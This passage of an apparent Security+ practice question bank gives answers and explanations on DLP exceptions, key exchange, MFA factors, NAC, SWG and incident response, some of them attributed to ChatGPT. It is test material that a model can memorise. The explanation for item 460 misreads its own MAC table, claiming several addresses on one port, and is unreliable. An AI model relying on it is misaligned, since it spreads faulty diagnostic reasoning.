Explanation: A risk register is a document used to identify and assess risks, and track the status of security controls.
Potential Shortcomings: Maintaining a risk register involves manual updates and does not provide an automated or rapid assessment of the current state of the laptops. It is more useful for ongoing risk management rather than immediate hardening assessments.

d. Manually review the secure configuration guide checklists:

Explanation: Manually reviewing checklists involves going through secure configuration guides to verify that each hardening step has been implemented.
Potential Shortcomings: Manual reviews are time-consuming and prone to human error. They are not efficient for quickly assessing multiple laptops and may miss some configuration details.

Therefore, option b (loading current baselines into the existing vulnerability scanner) is the most effective and efficient solution for quickly assessing the hardening of new laptops.

442
Q

A user is trying to upload a tax document which the corporate finance department requested but a security program is prohibiting the upload. A security analyst determines the file contains PII. Which of the following steps can the analyst take to correct this issue?

a. Create a URL filter with an exception for the destination website
b. Add a firewall rule to the outbound proxy to allow file uploads
c. Issue a new device certificate to the user’s workstation
d. Modify the exception list on the DLP to allow the upload

A

d. Modify the exception list on the DLP to allow the upload

Modifying the exception list on the Data Loss Prevention (DLP) system to allow the upload (option d) is the appropriate step to take in this scenario. Here’s why:

Context-Specific Exception: DLP systems are designed to prevent sensitive information, such as Personally Identifiable Information (PII), from being transmitted inappropriately. In this case, the upload is a legitimate request from the corporate finance department, so making an exception for this specific context ensures that the necessary document can be uploaded while maintaining overall security.
Granular Control: By modifying the exception list, the security analyst can allow the specific document or a specific type of document to be uploaded without broadly weakening security controls.
Minimal Disruption: This approach addresses the immediate issue without making broader changes to network or security configurations that could have unintended consequences.

Now, let’s examine the potential shortcomings of the other options:

a. Create a URL filter with an exception for the destination website:

Explanation: A URL filter exception would allow access to a specific website.
Potential Shortcomings: This does not address the underlying issue of the DLP system blocking the upload due to the presence of PII in the document. It might allow access to the website but would not permit the upload if the DLP is still in place.

b. Add a firewall rule to the outbound proxy to allow file uploads:

Explanation: A firewall rule could be added to allow file uploads to a specific destination.
Potential Shortcomings: This might bypass some security controls but does not specifically address the DLP system's detection of PII. It could also open broader security risks by allowing other uploads that should be blocked.

c. Issue a new device certificate to the user’s workstation:

Explanation: Issuing a new device certificate might be used for authentication or encryption purposes.
Potential Shortcomings: This does not directly address the issue of the DLP system blocking the upload. Changing the device certificate is unlikely to resolve the problem of PII detection and would not affect the DLP policy.

Therefore, the best approach to resolve the issue while maintaining security controls is to modify the exception list on the DLP system to allow the upload of the specific tax document requested by the corporate finance department.

443
Q

A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the following concepts would help the analyst meet this goal in a secure manner?

a. Digital signatures
b. Key exchange
c. Salting
d. PPTP

A

(Community : B 100%)
Key exchange is a concept in cryptography that involves the secure exchange of cryptographic keys between two parties to establish a secure communication channel. This process involves using a secure algorithm to exchange keys without exposing them to eavesdropping or interception.

ChatGPT :
b. Key exchange

Key exchange (option b) is a fundamental concept in establishing a secure communication channel. It involves securely exchanging cryptographic keys between parties, allowing them to encrypt and decrypt messages. Here’s why key exchange is essential in this context:

Secure Communication: Key exchange ensures that both parties have the necessary keys to encrypt and decrypt communications, thereby maintaining confidentiality and integrity.
Foundation for Encryption: Effective encryption relies on secure key exchange mechanisms, such as Diffie-Hellman or RSA, to securely share keys over an insecure channel.

Let’s review the potential shortcomings of the other options:

a. Digital signatures:

Explanation: Digital signatures provide a way to verify the authenticity and integrity of a message, ensuring that it has not been tampered with and that it was sent by a verified sender.
Potential Shortcomings: While digital signatures are important for verifying authenticity and integrity, they do not establish the encryption keys necessary for secure communication.

c. Salting:

Explanation: Salting involves adding random data to inputs of hash functions, primarily used to securely store passwords and prevent dictionary attacks.
Potential Shortcomings: Salting is not relevant to establishing secure communication channels, as it is primarily used for enhancing the security of stored passwords.

d. PPTP (Point-to-Point Tunneling Protocol):

Explanation: PPTP is a method for implementing virtual private networks (VPNs).
Potential Shortcomings: While PPTP can create secure communication channels, it is considered outdated and has known vulnerabilities. More secure alternatives, such as OpenVPN or IPsec, are preferred for establishing secure connections.

Therefore, key exchange (option b) is the most appropriate concept to help the analyst establish a secure communication channel between Company A and Company B.

444
Q

A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

a. Dump file
b. System log
c. Web application log
d. Security log

A

a. Dump file

Reviewing the dump file (option a) should be the first step for the analyst in this scenario. Here’s why:

Detailed Information: A dump file, often created when a system crashes, contains detailed information about the state of the system at the time of the crash. It includes memory contents, running processes, and other relevant data that can help identify the cause of the error and the nature of the malware.
Crash Analysis: Since the computer displayed an error screen and then shut down, the dump file is likely to contain critical information about what happened immediately before and during the crash, which is essential for diagnosing the issue.

Let’s review the potential shortcomings of the other options:

b. System log:

Explanation: The system log contains records of system events and messages, such as system startup and shutdown, service failures, and hardware changes.
Potential Shortcomings: While the system log can provide useful information about general system events, it may not have the detailed state information necessary to diagnose the cause of a crash resulting from malware.

c. Web application log:

Explanation: Web application logs record events related to web applications, such as user access, errors, and application-specific activities.
Potential Shortcomings: Web application logs are unlikely to contain relevant information about the system crash or the malware infection unless the malware specifically targeted a web application.

d. Security log:

Explanation: Security logs contain records of security-related events, such as login attempts, access control changes, and other security-related activities.
Potential Shortcomings: While security logs are important for understanding unauthorized access and other security incidents, they may not provide the detailed crash-related information available in the dump file.

Therefore, the dump file (option a) is the most appropriate choice for the analyst to review first to determine more information about the malware infection and subsequent system crash.

445
Q

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

a. POP
b. IPSec
c. IMAP
d. PGP

A

d. PGP

PGP (Pretty Good Privacy) is the most appropriate choice for the security architect in this scenario. Here’s why:

Encryption: PGP provides strong encryption for email content, ensuring that sensitive data is protected when sent via email.
No Additional Infrastructure Needed: PGP can be implemented without the need for additional infrastructure. It is software-based and can be integrated with existing email systems.
End-to-End Security: PGP offers end-to-end encryption, meaning that the data is encrypted on the sender's device and remains encrypted until it is decrypted by the intended recipient.

Let’s review the potential shortcomings of the other options:

a. POP (Post Office Protocol):

Explanation: POP is a protocol used to retrieve email from a mail server.
Potential Shortcomings: POP does not provide encryption for email content. It is primarily concerned with downloading emails from a server to a client and does not address the need for secure transmission of sensitive data.

b. IPSec (Internet Protocol Security):

Explanation: IPSec is a suite of protocols used to secure Internet Protocol (IP) communications by authenticating and encrypting each IP packet in a communication session.
Potential Shortcomings: While IPSec provides robust security for network traffic, it requires configuration and infrastructure support, such as VPNs. It is not specifically designed for securing email content and may involve additional complexity and cost.

c. IMAP (Internet Message Access Protocol):

Explanation: IMAP is a protocol used to retrieve email messages from a mail server.
Potential Shortcomings: Like POP, IMAP does not provide encryption for email content. It is designed for accessing and managing emails on a mail server, not for securing the transmission of sensitive data.

Therefore, PGP (option d) is the best choice for sending sensitive data via email without requiring additional infrastructure and while providing strong encryption to ensure data security.

446
Q

A user reset the password for a laptop but has been unable to log in to it since then. In addition, several unauthorized emails were sent on the user’s behalf recently. The security team investigates the issue and identifies the following findings:

*Firewall logs show excessive traffic from the laptop to an external site.
*Unknown processes were running on the laptop.
*RDP connections that appeared to be authorized were made to other network devices from the laptop.
*High bandwidth utilization alerts from that user’s username.

Which of the following is most likely installed on the laptop?

a. Worm
b. Keylogger
c. Trojan
d. Logic bomb

A

c. Trojan

A Trojan is the most likely type of malware installed on the laptop based on the findings. Here’s why:

Excessive Traffic: Trojans often communicate with external sites to exfiltrate data or receive commands from a remote attacker.
Unknown Processes: Trojans typically run unknown or unauthorized processes as part of their malicious activities.
RDP Connections: Trojans can be used to establish remote access to compromised devices, allowing attackers to move laterally within the network.
High Bandwidth Utilization: This could indicate data exfiltration or other malicious activities orchestrated by the Trojan.

Let’s review the potential shortcomings of the other options:

a. Worm:

Explanation: A worm is a type of malware that replicates itself to spread to other devices, often consuming network resources.
Potential Shortcomings: While worms can cause high bandwidth utilization, they typically do not focus on unauthorized RDP connections or exfiltrating data to external sites.

b. Keylogger:

Explanation: A keylogger records keystrokes to capture sensitive information like passwords.
Potential Shortcomings: Keyloggers do not usually generate excessive traffic, run unknown processes, or make RDP connections. Their primary function is to capture and report keystrokes.

d. Logic Bomb:

Explanation: A logic bomb is a piece of code intentionally inserted into software that triggers a malicious function when certain conditions are met.
Potential Shortcomings: Logic bombs are generally designed to execute specific malicious actions under predefined conditions. They do not typically account for continuous unauthorized activity like excessive traffic or RDP connections.

Therefore, a Trojan (option c) is the most plausible explanation for the observed behaviors on the compromised laptop.

447
Q

A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Choose two.)

a. Passphrase
b. Time-based one-time password
c. Facial recognition
d. Retina scan
e. Hardware token
f. Fingerprints

A

b. Time-based one-time password
e. Hardware token

Both time-based one-time passwords (TOTP) and hardware tokens are examples of possession factors used in multi-factor authentication (MFA). Here’s why these options are appropriate:

Time-based one-time password (TOTP): TOTP generates a unique, temporary code that users must provide, typically through an app on a mobile device. This code changes every few seconds and can only be accessed by someone who possesses the device where the app is installed.
Hardware token: A hardware token is a physical device that generates or stores authentication codes. Users must have the physical token to authenticate, which serves as the possession factor.

Now, let’s review why the other options are not suitable for the possession factor:

a. Passphrase:

Explanation: A passphrase is a knowledge factor (something the user knows), not a possession factor.
Suitability: Does not meet the requirement for a possession factor in MFA.

c. Facial recognition:

Explanation: Facial recognition is a biometric factor (something the user is), not a possession factor.
Suitability: Does not meet the requirement for a possession factor in MFA.

d. Retina scan:

Explanation: A retina scan is also a biometric factor.
Suitability: Does not meet the requirement for a possession factor in MFA.

f. Fingerprints:

Explanation: Fingerprints are another form of biometric authentication.
Suitability: Does not meet the requirement for a possession factor in MFA.

Therefore, the systems administrator should choose time-based one-time password (TOTP) and hardware token to enforce MFA relying on the possession factor for corporate email account access.

448
Q

Which of the following best describes a technique that compensates researchers for finding vulnerabilities?

a. Penetration testing
b. Code review
c. Wardriving
d. Bug bounty

A

d. Bug bounty

A bug bounty program is a technique that compensates researchers (often referred to as ethical hackers or security researchers) for finding and reporting vulnerabilities in a company’s software, systems, or applications. Here’s why:

Incentive for Discovery: Bug bounty programs offer monetary rewards or other forms of compensation to researchers who responsibly disclose security flaws.
Crowdsourced Security: By engaging a wide community of researchers, companies can leverage diverse skill sets and perspectives to identify vulnerabilities that might be missed by internal teams.
Responsible Disclosure: These programs encourage researchers to report vulnerabilities directly to the company, allowing them to address the issues before they can be exploited maliciously.

Let’s review the other options:

a. Penetration testing:

Explanation: Penetration testing involves hiring security professionals to simulate attacks on a system to identify vulnerabilities.
Compensation Aspect: While penetration testers are compensated, it is usually for their services rather than specific vulnerabilities they find. This is typically a contracted service, not an open incentive program.

b. Code review:

Explanation: Code review is the process of systematically examining source code to find and fix vulnerabilities.
Compensation Aspect: Code reviews are often conducted by internal teams or hired consultants as part of the development process, not through an open incentive program for vulnerability discovery.

c. Wardriving:

Explanation: Wardriving involves searching for Wi-Fi networks, often for the purpose of identifying unsecured networks.
Compensation Aspect: Wardriving is not a technique that involves compensating researchers for finding vulnerabilities. It is typically associated with network reconnaissance rather than a structured, compensatory vulnerability discovery program.

Therefore, bug bounty (option d) best describes a technique that compensates researchers for finding vulnerabilities.

449
Q

Which of the following biometric authentication methods is the most accurate?

a. Gait
b. Retina
c. Signature
d. Voice

A

b. Retina

Retina scanning is considered one of the most accurate biometric authentication methods. Here’s why:

High Precision: Retina scans analyze the unique pattern of blood vessels in the retina, which is highly specific to each individual.
Low False Acceptance Rate (FAR): Retina scanning has a very low rate of false positives, meaning it is highly reliable in correctly identifying individuals.
Security: Since the retina is located inside the eye and not easily visible or replicable, it is less susceptible to spoofing or other forms of biometric fraud.

Let’s review the other options and their relative accuracy:

a. Gait:

Explanation: Gait analysis involves identifying individuals based on their walking pattern.
Accuracy: While unique to individuals, gait can be influenced by various factors such as footwear, injuries, and changes in walking surface, making it less accurate compared to retina scanning.

c. Signature:

Explanation: Signature recognition involves analyzing the way a person signs their name.
Accuracy: Signatures can vary significantly even for the same person due to factors like speed, mood, and pressure, leading to lower accuracy compared to retina scanning.

d. Voice:

Explanation: Voice recognition analyzes vocal characteristics to identify individuals.
Accuracy: Voice can be affected by illness, background noise, and intentional alteration, making it less reliable than retina scanning.

Therefore, retina scanning (option b) is the most accurate biometric authentication method among the options listed.

450
Q

A security team will be outsourcing several key functions to a third party and will require that:

*Several of the functions will carry an audit burden
*Attestations will be performed several times a year
*Reports will be generated on a monthly basis

Which of the following best describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

a. MOU
b. AUP
c. SLA
d. MSA

A

c. SLA (Service Level Agreement)

An SLA (Service Level Agreement) is the best document to define the requirements and stipulate how and when the outsourced functions will be performed by the third party. Here’s why:

Service Commitments: An SLA details the specific services to be provided, the standards and performance metrics that must be met, and the responsibilities of both parties.
Audit Burden: SLAs can include provisions for audit requirements, ensuring that the third party adheres to regulatory and compliance standards.
Attestations: SLAs can stipulate how often and in what manner attestations are to be performed.
Reporting: SLAs typically include schedules for regular reporting, such as monthly reports, to ensure transparency and accountability.

Let’s review the potential shortcomings of the other options:

a. MOU (Memorandum of Understanding):

Explanation: An MOU is a non-binding agreement that outlines the intentions and terms of a mutual understanding between parties.
Shortcomings: MOUs are generally not as detailed or enforceable as SLAs and may lack specific performance metrics and audit requirements.

b. AUP (Acceptable Use Policy):

Explanation: An AUP defines acceptable and unacceptable use of company resources and services.
Shortcomings: An AUP is not used to define service levels or audit requirements. It is focused on user behavior and compliance with internal policies.

d. MSA (Master Service Agreement):

Explanation: An MSA is a contract that outlines the overall terms and conditions governing the relationship between two parties over multiple projects or services.
Shortcomings: While an MSA provides a broad framework, it usually does not include the detailed performance metrics, audit schedules, and reporting requirements that are typically found in an SLA.

Therefore, the SLA (Service Level Agreement) is the most appropriate document to define the specific requirements and stipulate how and when the outsourced functions will be performed by the third party.

451
Q

A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all polls so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again? (Choose three.)

a. install DLP software to prevent data loss
b. Use the latest version of software
c. Install a SIEM device
d. Implement MDM
e. Implement a screened subnet for the web server
f. Install an endpoint security solution
g. Update the website certificate and revoke the existing ones
h. Deploy additional network sensors

A

(Community : BEF 100%)

The following are the three actions that should be taken to prevent a ransomware attack from happening again:

B. Use the latest version of software: Using the latest version of software will help to patch any vulnerabilities that may exist in older versions of the software.

E. Implement a screened subnet for the web server: A screened subnet, or demilitarized zone (DMZ), can be used to isolate the web-facing server from the internal network and to restrict inbound and outbound traffic.

F. Install an endpoint security solution: An endpoint security solution can help to protect workstations from malware and ransomware attacks

ChatGPT :
b. Use the latest version of software
e. Implement a screened subnet for the web server
f. Install an endpoint security solution

B. Use the latest version of software: The company should upgrade to the latest version of the third-party software that is used to manage the website. Older versions of software often have known vulnerabilities that can be exploited by attackers. Upgrading to the latest version can help ensure that the company is using software that has the latest security patches and fixes.

E. Implement a screened subnet for the web server: The company should implement a screened subnet, also known as a DMZ (demilitarized zone), to separate the web-facing server from the internal network. This will provide an additional layer of security by limiting the potential attack surface and reducing the risk of lateral movement by attackers.

F. Install an endpoint security solution: An endpoint security solution should be installed on all workstations to protect against malware and ransomware. This can include anti-virus software, host-based firewalls, and other endpoint security controls.

452
Q

A security investigation revealed that malicious software was installed on a server using a server administrator’s credentials. During the investigation, the server administrator explained that Telnet was regularly used to log in. Which of the following most likely occurred?

a. A spraying attack was used to determine which credentials to use
b. A packet capture tool was used to steal the password
c. A remote-access Trojan was used to install the malware
d. A dictionary attack was used to log in as the server administrator

A

b. A packet capture tool was used to steal the password

Telnet is an unencrypted protocol that sends data, including login credentials, in clear text over the network. This means that anyone with access to the network traffic can use a packet capture tool to intercept and read the login credentials. In this case, an attacker could have used a packet capture tool to steal the server administrator’s password and then used it to log in and install the malicious software on the server.

453
Q

Which of the following roles would most likely have direct access to the senior management team?

a. Data custodian
b. Data owner
c. Data protection officer
d. Data controller

A

b. Data owner

The data owner (option b) would most likely have direct access to the senior management team. Here’s why:

Responsibility for Data: The data owner is responsible for making decisions about how data is used, protected, and accessed within an organization.
Accountability: They often have authority over data management policies and practices, which can include reporting directly to senior management on data-related issues.
Strategic Decisions: Access to senior management is crucial for data owners to communicate data strategy, compliance issues, and risk management related to data assets.

Let’s briefly explain why the other options are less likely to have direct access to senior management:

a. Data custodian:

Explanation: Data custodians are responsible for the storage, maintenance, and protection of data assets according to the policies set by the data owner and senior management.
Access to Senior Management: While data custodians play a critical role in data management, their responsibilities typically do not include direct interaction with senior management on strategic decisions related to data.

c. Data protection officer:

Explanation: A Data Protection Officer (DPO) ensures an organization complies with data protection regulations, handles data privacy issues, and acts as a point of contact for data subjects and regulatory authorities.
Access to Senior Management: DPOs may interact with senior management on compliance matters and data protection strategies, but their focus is more on regulatory compliance rather than direct data management decisions.

d. Data controller:

Explanation: Data controllers determine the purposes and means of processing personal data within an organization.
Access to Senior Management: Like data owners, data controllers may have interactions with senior management, particularly regarding data processing activities and compliance with data protection regulations. However, their scope of responsibility is more focused on specific data processing functions rather than overarching data strategy.

Therefore, the data owner (option b) is the role most likely to have direct access to the senior management team due to their responsibility for making decisions about data management and strategy within the organization.

454
Q

Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement?

a. Communication plan
b. Disaster recovery plan
c. Business continuity plan
d. Risk plan

A

a. Communication plan

A communication plan (option a) is designed to ensure stakeholders are kept informed about incidents and receive timely updates on status changes as they occur. Here’s why:

Stakeholder Communication: A communication plan specifies how information about incidents, their impact, and recovery efforts will be communicated to stakeholders.
Timely Updates: It outlines the methods, channels, and frequency of communication to ensure stakeholders receive accurate and timely updates.
Coordination: The plan ensures coordination among internal teams, external parties, and stakeholders during incident response and recovery phases.

Let’s briefly explain why the other options are less likely to fulfill the specific requirement of keeping stakeholders informed about incidents and status updates:

b. Disaster recovery plan:

Explanation: A disaster recovery plan focuses on restoring IT systems and infrastructure after a disruptive event. While communication is a component of disaster recovery, its primary focus is on technical recovery rather than stakeholder communication.

c. Business continuity plan:

Explanation: A business continuity plan outlines procedures to ensure critical business functions continue during and after a disaster or disruption. It includes communication elements but is broader in scope than incident-specific communication to stakeholders.

d. Risk plan:

Explanation: A risk management plan identifies, assesses, and mitigates risks within an organization. While risk plans include communication strategies for risk-related information, they do not specifically address incident-specific communication to stakeholders.

Therefore, a communication plan (option a) is specifically tailored to fulfill the requirement of keeping stakeholders aware of incidents and providing them with updates on status changes as they occur.

455
Q

An employee who is using a mobile device for work, is required to use a fingerprint to unlock the device. Which of the following is this an example of?

a. Something you know
b. Something you are
c. Something you have
d. Somewhere you are

A

b. Something you are

This scenario where an employee uses a fingerprint to unlock a mobile device is an example of “something you are” (option b) in terms of authentication factors. Here’s why:

Biometric Authentication: A fingerprint is a biometric characteristic unique to the individual user.
Identification Factor: Biometrics, such as fingerprints, iris scans, or facial recognition, are classified as "something you are" because they identify individuals based on their physical characteristics.
Authentication Factor: In multi-factor authentication (MFA), biometrics serve as a strong authentication factor, providing a high level of security based on the uniqueness and difficulty of replication of these physical traits.

Let’s briefly explain why the other options are not applicable in this context:

a. Something you know:

Explanation: This refers to authentication factors based on knowledge, such as passwords or PINs.
Not Applicable: While the device may also require a PIN or password as an additional factor, the use of a fingerprint specifically falls under "something you are."

c. Something you have:

Explanation: This refers to authentication factors based on possession, such as smart cards, tokens, or mobile devices themselves.
Not Applicable: While the mobile device itself is something the user has, the fingerprint used for unlocking the device is not considered as "something you have."

d. Somewhere you are:

Explanation: This refers to authentication factors based on location or context, such as GPS or IP geolocation.
Not Applicable: The use of a fingerprint for device unlock does not relate to the user's physical location or environment.

Therefore, using a fingerprint to unlock a mobile device is an example of “something you are” (option b) in the context of authentication factors.

456
Q

Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?

a. Visitor logs
b. Faraday cages
c. Access control vestibules
d. Motion detection sensors

A

c. Access control vestibules

Access control vestibules (option c) can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance. Here’s how they work:

Purpose: Access control vestibules, also known as mantraps or airlocks, are designed to control entry into secure areas.
Operation: They consist of two sets of doors that cannot be opened simultaneously. An individual must use their access card to enter the first door, which then closes behind them before they can use the card again to open the second door.
Preventing Tailgating: This design prevents unauthorized individuals from following someone through a door before it closes, ensuring that only one person can pass through per valid access card swipe.

Let’s briefly review why the other options are not suitable for preventing multiple people from using a single access card:

a. Visitor logs:

Explanation: Visitor logs track the entry and exit of individuals into a facility but do not prevent multiple people from entering simultaneously with one access card.

b. Faraday cages:

Explanation: Faraday cages are enclosures designed to block electromagnetic signals, often used to protect electronic equipment from electromagnetic interference (EMI) or to isolate sensitive information from external electromagnetic signals. They do not relate to preventing multiple people from using a single access card.

d. Motion detection sensors:

Explanation: Motion detection sensors are used to detect movement in specific areas but do not directly prevent multiple people from using a single access card to gain entry.

Therefore, access control vestibules (option c) are specifically designed to prevent unauthorized multiple entries with a single access card and are an effective security control for this purpose.

457
Q

Unauthorized devices have been detected on the internal network. The devices’ locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

a. NAC
b. DLP
c. IDS
d. MFA

A

a. NAC (Network Access Control)

Network Access Control (NAC) (option a) would be the best technical control to implement to prevent unauthorized devices from accessing the internal network. Here’s why:

Purpose: NAC enforces security policies on devices seeking to access the network. It ensures that only authorized and compliant devices can connect to the network.
Controlled Access: NAC can authenticate devices based on their identity, compliance status (such as up-to-date antivirus software), and user credentials before allowing access to the network.
Segregation: It can segment devices into different network zones based on their compliance level, ensuring that unauthorized or non-compliant devices are restricted to isolated network segments.

Let’s briefly review why the other options are not the best choices for preventing unauthorized devices from accessing the network in this scenario:

b. DLP (Data Loss Prevention):

Explanation: DLP solutions focus on preventing unauthorized data exfiltration rather than controlling access to the network based on device compliance.
Not Applicable: While DLP is important for protecting data, it does not address the issue of unauthorized devices connecting to the network.

c. IDS (Intrusion Detection System):

Explanation: IDS monitors network traffic for suspicious activity or known threats but does not directly prevent unauthorized devices from connecting to the network.
Not Applicable: IDS is more reactive in nature and does not provide the proactive control over network access that NAC does.

d. MFA (Multi-Factor Authentication):

Explanation: MFA adds an additional layer of security by requiring multiple factors for user authentication, such as a password and a token or biometric verification.
Not Applicable: While MFA is important for user authentication, it does not address the issue of unauthorized devices physically connecting to the network through Ethernet ports.

Therefore, Network Access Control (NAC) (option a) is the most appropriate technical control to implement to prevent unauthorized devices from accessing the internal network via Ethernet ports in conference rooms.

458
Q

A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites whether the employee is in the office or away. Which of the following solutions should the CISO implement?

a. WAF
b. SWG
c. VPN
d. HIDS

A

b. SWG (Secure Web Gateway)

A Secure Web Gateway (SWG) (option b) would be the best solution for the Chief Information Security Officer (CISO) to implement in order to protect against certain categories of websites whether the employee is in the office or away. Here’s why:

Web Filtering: SWGs are designed to enforce company policies on web usage by filtering and monitoring web access based on predefined categories (such as adult content, gambling, social media, etc.).
Protection Anywhere: SWGs can apply these policies regardless of whether the employee is accessing the internet from the office network or remotely, such as from home or a public Wi-Fi hotspot.
Security and Compliance: They provide protection against web-based threats, enforce compliance with corporate internet usage policies, and ensure consistent security across all network access points.

Let’s briefly review why the other options are less suitable for this specific requirement:

a. WAF (Web Application Firewall):

Explanation: WAFs protect web applications by filtering and monitoring HTTP traffic between a web application and the internet.
Not Applicable: While WAFs are important for protecting web applications, they do not filter or control user access to websites based on categories.

c. VPN (Virtual Private Network):

Explanation: VPNs create encrypted tunnels for secure remote access to the corporate network, but they do not filter or control web browsing based on website categories.
Not Applicable: VPNs provide secure access to internal resources but do not specifically address the filtering of website categories.

d. HIDS (Host-based Intrusion Detection System):

Explanation: HIDS monitor the internals of a computing system against malicious activities or policy violations.
Not Applicable: HIDS focus on monitoring and detecting suspicious activities within a host system, not on controlling web access based on website categories.

Therefore, a Secure Web Gateway (SWG) (option b) is the most suitable solution for implementing web filtering and enforcing policies against certain categories of websites regardless of the employee’s location.

459
Q

A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?

a. theHarvester
b. Cuckoo
c. Nmap
d. Nessus

A

a. theHarvester

The best application for a security analyst to use for gathering information through OSINT (Open Source Intelligence) to verify whether company data is available publicly is theHarvester (option a). Here’s why:

Purpose: theHarvester is specifically designed for gathering email addresses, subdomains, hosts, employee names, open ports, and banners from different public sources like search engines and PGP key servers.
OSINT Focus: It is widely used for reconnaissance and information gathering during security assessments to identify what information about a company or its employees is publicly accessible.
Output: theHarvester aggregates data from various sources into a structured format, facilitating further analysis and assessment of potential security risks related to exposed information.

Let’s briefly review why the other options are less suitable for this specific task:

b. Cuckoo:

Explanation: Cuckoo is a malware analysis sandbox platform used for analyzing suspicious files and URLs to detect malware behavior.
Not Applicable: Cuckoo is not used for OSINT activities like gathering publicly available company data.

c. Nmap:

Explanation: Nmap is a network scanning tool used for discovering hosts and services on a computer network, auditing network security, and managing service upgrade schedules.
Not Applicable: While Nmap can reveal information about network hosts and services, it is not specifically designed for gathering publicly available information about a company from external sources.

d. Nessus:

Explanation: Nessus is a vulnerability scanning tool used for identifying vulnerabilities, configuration issues, and malware on network devices, servers, and applications.
Not Applicable: Nessus focuses on vulnerability assessment and does not perform OSINT tasks like gathering publicly available information about a company.

Therefore, theHarvester (option a) is the most appropriate application for a security analyst to use when conducting OSINT to verify whether company data is publicly available.

460
Q

A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output:

VLAN MAC PORT
1 00-04-18-EB-14-30 Fa0/1
1 88-CD-34-19-E8-98 Fa0/2
1 40-11-08-87-10-13 Fa0/3
1 00-04-18-EB-14-30 Fa0/4
1 88-CD-34-00-15-F3 Fa0/5
1 FA-13-02-04-27-64 Fa0/6

Which of the following best describes the attack that is currently in progress’?

a. MAC flooding
b. Evil twin
c. ARP poisoning
d. DHCP spoofing

A

a. MAC flooding

The output from the show mac address-table command indicates that there are multiple MAC addresses associated with the same port (Fa0/1 in this case). This situation is indicative of a MAC flooding attack. Here’s why:

MAC Address Table: The MAC address table (CAM table) maps MAC addresses to corresponding switch ports. Normally, each MAC address should map to a unique port to avoid confusion in directing traffic.
Duplicate MACs: Seeing multiple MAC addresses associated with the same port (Fa0/1) suggests that the switch is overwhelmed with MAC addresses, exceeding its capacity to manage MAC-to-port mappings efficiently.
Attack Description: MAC flooding is a type of attack where an attacker floods the switch with a large number of fake MAC addresses. This can cause the switch to enter a state known as "failopen," where it begins to behave like a hub and broadcasts traffic to all ports, rather than just the intended destination port.

Let’s briefly review why the other options are less likely to be the correct answer:

b. Evil twin:

Explanation: An evil twin attack involves setting up a rogue Wi-Fi access point to mimic a legitimate one, tricking users into connecting to it instead. This is not relevant to the scenario described with a network switch and MAC addresses.

c. ARP poisoning:

Explanation: ARP poisoning (or ARP spoofing) involves manipulating ARP (Address Resolution Protocol) messages to associate a different MAC address with an IP address. While ARP poisoning can lead to network issues, the symptoms described (multiple MAC addresses on the same switch port) are not characteristic of ARP poisoning.

d. DHCP spoofing:

Explanation: DHCP spoofing involves a malicious device impersonating a legitimate DHCP server to distribute incorrect IP addresses or other configuration information. This does not directly relate to the symptoms described with MAC addresses on a switch port.

Therefore, based on the information provided, the most likely attack in progress is MAC flooding (option a), which is causing the speed and latency issues experienced by the LAN-connected devices.

461
Q

A security administrator needs to add fault tolerance and load balancing to the connection from the file server to the backup storage. Which of the following is the best choice to achieve this objective?

a. Multipath
b. RAID
c. Segmentation
d. 802.11

A

a. Multipath

Multipath (option a) is the best choice to achieve fault tolerance and load balancing for the connection from the file server to the backup storage. Here’s why:

Fault Tolerance: Multipath technology allows for redundant paths between devices, ensuring that if one path fails or experiences issues, traffic can automatically failover to another available path. This enhances fault tolerance by providing redundancy.
Load Balancing: Multipath also supports load balancing by distributing data traffic across multiple paths. This optimizes performance and utilization of network resources, ensuring efficient use of available bandwidth.
Application: In the context of connecting a file server to backup storage, multipath can ensure continuous access to data (fault tolerance) and distribute data transfer across multiple links (load balancing), improving overall reliability and performance of the backup process.

Let’s briefly review why the other options are less suitable for achieving fault tolerance and load balancing in this scenario:

b. RAID (Redundant Array of Independent Disks):

Explanation: RAID is used to combine multiple physical disk drives into a single logical unit to improve performance, data redundancy, or both. However, RAID operates at the disk level and does not provide fault tolerance or load balancing for network connections.

c. Segmentation:

Explanation: Segmentation typically refers to dividing a network into segments or subnets for organizational or security purposes. It does not provide fault tolerance or load balancing for network connections.

d. 802.11:

Explanation: 802.11 refers to the IEEE standard for wireless local area networks (Wi-Fi). It is not applicable to wired connections between a file server and backup storage, nor does it provide fault tolerance or load balancing for such connections.

Therefore, Multipath (option a) is the most appropriate choice to achieve fault tolerance and load balancing for the connection from the file server to the backup storage, ensuring reliability and optimal performance of data transfers.

462
Q

Which of the following incident response phases should the proper collection of the detected IoCs and establishment of a chain of custody be performed before?

a. Containment
b. Identification
c. Preparation
d. Recovery

A

a. Containment

Explanation:

Identification: In this phase, the security team identifies that an incident has occurred based on the detected IoCs or other suspicious activities.

Containment: Once the incident is identified, containment involves taking actions to prevent further damage or spread of the incident within the environment. This could include isolating affected systems, disabling compromised accounts, or blocking malicious traffic.

Preparation: This phase involves preparing the incident response team, resources, and tools necessary to effectively respond to and mitigate the incident.

Recovery: After containing the incident and mitigating its impact, recovery focuses on restoring affected systems and services to normal operations.

Importance of IoCs and Chain of Custody:

IoCs: These are crucial digital artifacts that provide evidence of malicious activities or compromises. Collecting and analyzing IoCs helps in understanding the scope and nature of the incident.

